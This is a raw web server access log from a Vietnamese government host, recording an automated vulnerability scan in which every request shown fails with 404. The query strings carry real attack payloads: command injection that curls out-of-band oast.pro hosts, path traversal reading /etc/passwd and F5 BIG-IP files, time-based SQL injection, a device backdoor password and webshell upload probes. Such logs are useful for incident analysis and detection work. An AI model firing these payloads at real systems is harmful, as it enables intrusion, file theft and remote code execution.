115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 30 2024-12-10 06:16:49 103.153.214.94 POST /login.htm - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 25 2024-12-10 06:17:14 103.153.214.94 GET /setup.cgi todo=debug&x=currentsetting.htm 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 404 7 0 23 2024-12-10 06:17:27 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 23 2024-12-10 06:17:30 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_7_9)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.4+Safari/605.1.15 - 404 7 0 31 2024-12-10 06:19:52 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 25 2024-12-10 06:19:56 103.153.214.94 POST /checkValid - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 23 2024-12-10 06:20:01 103.153.214.94 GET /public/css/2q0PiMj8D8FWzz4euNRaxs7HueA.css - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 24 2024-12-10 06:25:37 103.153.214.94 POST /goform/setSysAdm - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.shtml 404 7 0 27 2024-12-10 06:27:09 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//ctbq6epdf88k4t1c60lgakq6s764e6qzu.oast.pro+-H+'User-Agent%3a+td0Xn7'%60 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.23 - 404 7 0 27 2024-12-10 06:27:12 103.153.214.94 GET /tos/index.php explorer/pathList&path=%60curl+http%3a//ctbq6epdf88k4t1c60lgkdopd9ixznzxj.oast.pro+-H+'User-Agent%3a+td0Xn7'%60 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 23 2024-12-10 06:28:31 103.153.214.94 POST /auth/check - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 28 2024-12-10 06:28:32 103.153.214.94 POST /actions/authenticate.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.21 - 404 7 0 23 2024-12-10 06:29:19 103.153.214.94 POST /auth/newpassword - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 25 2024-12-10 06:29:30 103.153.214.94 POST /convert - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 06:29:32 103.153.214.94 GET /file/PhxyWg.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 24 2024-12-10 06:30:24 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 27 2024-12-10 06:31:12 103.153.214.94 POST /assets/php/upload.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 http://bcvt.kontum.gov.vn:8172 404 7 0 26 2024-12-10 06:31:15 103.153.214.94 GET /assets/data/usrimg/2q0piftjea3f33owkdhidxot0w3.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/11.1+Safari/605.1.15 - 404 7 0 25 2024-12-10 06:33:50 103.153.214.94 POST /dfsms/ - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:77.0)+Gecko/20100101+Firefox/77.0 - 404 7 0 39 2024-12-10 06:33:58 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 06:34:01 103.153.214.94 GET /ext-js/index.html - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.22 - 404 7 0 24 2024-12-10 06:34:11 103.153.214.94 GET /index.php/catalogsearch/advanced/result/ name=e 8172 - 115.146.123.211 Mozilla/5.0+(X11;+U;+Linux+i686;+en-US)+AppleWebKit/534.1+SUSE/6.0.428.0+(KHTML,+like+Gecko)+Chrome/6.0.428.0+Safari/534.1 - 404 7 0 26 2024-12-10 06:34:39 103.153.214.94 POST /incom/modules/uploader/showcase/script.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 06:34:41 103.153.214.94 GET /upload/userfiles/image/2q0PiMUZ3iQ27cjYhZwOMEiOKA9.png - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/39.0.2171.99+Safari/537.36 - 404 7 0 26 2024-12-10 06:35:28 103.153.214.94 POST /EemAdminService/EemAdmin - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 36 2024-12-10 06:37:47 103.153.214.94 POST /auth/requestreset - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-10 06:37:50 103.153.214.94 POST /auth/requestreset - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.46 - 404 7 0 23 2024-12-10 06:40:10 103.153.214.94 POST /os/mxperson - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/73.0.3683.75+Safari/537.36 - 404 7 0 42 2024-12-10 06:40:13 103.153.214.94 POST /meaweb/os/mxperson - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 06:40:20 103.153.214.94 POST /CTCWebService/CTCWebServiceBean/ConfigServlet - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 06:44:47 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 27 2024-12-10 06:44:49 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 06:46:24 103.153.214.94 GET /zimlet/com_zimbra_webex/httpPost.jsp companyId=http://ctbq6epdf88k4t1c60lgi9n4u6x1rd5xr.oast.pro%23 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.24 - 404 7 0 29 2024-12-10 06:46:25 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 24 2024-12-10 06:46:26 103.153.214.94 POST /api/jsonws/invoke - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 7 0 24 2024-12-10 06:46:26 103.153.214.94 POST /api/jsonws/invoke - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/64.0.3282.140+Safari/537.36+Edge/17.17134 https://bcvt.kontum.gov.vn:8172/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 7 0 26 2024-12-10 06:47:48 103.153.214.94 POST /cgi-bin/mainfunction.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 28 2024-12-10 06:49:24 103.153.214.94 POST /session/create - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 25 2024-12-10 06:52:40 103.153.214.94 GET /graph_realtime.php action=init 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 31 2024-12-10 06:53:14 103.153.214.94 POST /getcfg.php - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 47 2024-12-10 06:53:16 103.153.214.94 POST /magmi/web/magmi_saveprofile.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.8.22 - 404 7 0 26 2024-12-10 06:53:20 103.153.214.94 POST /magmi/web/magmi_run.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_5)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 25 2024-12-10 06:53:22 103.153.214.94 GET /magmi/web/info.php - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 24 2024-12-10 06:54:26 103.153.214.94 POST /graphql - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 06:54:28 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 23 2024-12-10 06:55:52 103.153.214.94 POST /upload - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 25 2024-12-10 07:00:23 103.153.214.94 POST /storfs-asup - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-10 07:02:46 103.153.214.94 GET /info.html - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_7_3;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.7+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 26 2024-12-10 07:03:02 103.153.214.94 POST /account/index.php - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 24 2024-12-10 07:03:06 103.153.214.94 POST /opensis/index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 25 2024-12-10 07:03:09 103.153.214.94 POST /index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.14+(KHTML,+like+Gecko)+Version/17.4.63+Safari/617.14 - 404 7 0 25 2024-12-10 07:03:13 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-10 07:03:17 103.153.214.94 GET /wp-admin/index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.12+(KHTML,+like+Gecko)+Version/17.3+Safari/617.12 - 404 7 0 25 2024-12-10 07:04:12 103.153.214.94 GET / author=1 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 22 2024-12-10 07:04:16 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 07:07:03 103.153.214.94 POST /cgi-bin/mt/mt-xmlrpc.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-10 07:07:04 103.153.214.94 POST /cgi-bin/readycloud_control.cgi 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 35 2024-12-10 07:07:04 103.153.214.94 POST /minio/webrpc - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 23 2024-12-10 07:09:53 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 26 2024-12-10 07:09:53 103.153.214.94 POST /_adminer.php - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 26 2024-12-10 07:09:54 103.153.214.94 POST /_adminer/index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 23 2024-12-10 07:09:54 103.153.214.94 POST /adminer/index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:93.0)+Gecko/20100101+Firefox/93.0 - 404 7 0 26 2024-12-10 07:09:54 103.153.214.94 POST /adminer/adminer.php - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 07:09:54 103.153.214.94 POST /index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 26 2024-12-10 07:09:54 103.153.214.94 POST /adminer.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 24 2024-12-10 07:10:36 103.153.214.94 GET /info.html - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Mobile/15E148+Safari/604.1 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 28 2024-12-10 07:11:34 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 07:14:09 103.153.214.94 POST /wp-json/buddypress/v1/signup - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 07:15:59 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 https://bcvt.kontum.gov.vn:8172 404 7 0 26 2024-12-10 07:15:59 103.153.214.94 POST /casa/nodes/thumbprints - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 27 2024-12-10 07:17:25 103.153.214.94 POST /apply_sec.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.26 - 404 7 0 32 2024-12-10 07:17:25 103.153.214.94 GET /info.html - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 25 2024-12-10 07:17:29 103.153.214.94 GET /cgi/cgi_i_filter.js _tn={{trimprefix(base64_decode(httoken), 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/113.0 https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 23 2024-12-10 07:17:29 103.153.214.94 POST /apply_sec.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 22 2024-12-10 07:17:44 103.153.214.94 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 28 2024-12-10 07:21:34 103.153.214.94 POST /AdminService/urest/v1/LogonResource - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 - 404 7 0 27 2024-12-10 07:21:34 103.153.214.94 POST /api/v4/ci/lint include_merged_yaml=true 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 42 2024-12-10 07:23:48 103.153.214.94 GET /cgi-bin/cgiServer worker=IndexNew 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 28 2024-12-10 07:23:50 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 39 2024-12-10 07:25:33 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.25 - 404 7 0 25 2024-12-10 07:25:37 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 24 2024-12-10 07:26:19 103.153.214.94 GET /wp-admin/admin-ajax.php action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=" 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 07:28:15 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/whatever 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-10 07:28:18 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/../../../context/2q0PiZeQC0ZYtGFpR8syX8eE35i.cfm 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 23 2024-12-10 07:28:21 103.153.214.94 POST /lucee/2q0PiZeQC0ZYtGFpR8syX8eE35i.cfm - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 - 404 7 0 24 2024-12-10 07:30:41 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-10 07:30:44 103.153.214.94 POST /analytics/telemetry/ph/api/hyper/send _c&_i=test 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.16 - 404 7 0 47 2024-12-10 07:32:48 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 07:34:33 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 28 2024-12-10 07:34:36 103.153.214.94 POST /mgmt/shared/authn/login - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 29 2024-12-10 07:36:19 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 5 0 27 2024-12-10 07:36:19 103.153.214.94 POST /wp-admin/admin-ajax.php action=pollinsertvalues 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 24 2024-12-10 07:36:22 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/f5-release 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 5 0 27 2024-12-10 07:36:26 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/config/bigip.license 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 5 0 29 2024-12-10 07:36:31 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 25 2024-12-10 07:36:35 103.153.214.94 POST /tmui/locallb/workspace/fileSave.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 07:36:38 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 59 2024-12-10 07:36:42 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 30 2024-12-10 07:40:39 103.153.214.94 POST /wp-json/pie/v1/login - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.16 - 404 7 0 28 2024-12-10 07:42:03 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 30 2024-12-10 07:42:37 103.153.214.94 POST /wp-comments-post.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+U;+Linux+i686;+pt-BR;+rv:1.9.0.3)+Gecko/2008092510+Ubuntu/8.04+(hardy)+Firefox/3.0.3 - 404 7 0 23 2024-12-10 07:42:41 103.153.214.94 GET /wp-content/plugins/imagements/images/2q0picnvhyxdlvg1mmax6tzs7ni.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/96.0.4664.93+Safari/537.36 - 404 7 0 24 2024-12-10 07:43:32 103.153.214.94 GET /forum/ subscribe_topic=1%20union%20select%201%20and%20sleep(6) 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 26 2024-12-10 07:43:33 103.153.214.94 GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 - 404 7 0 27 2024-12-10 07:44:06 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 26 2024-12-10 07:44:09 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/znovek/xz.php - 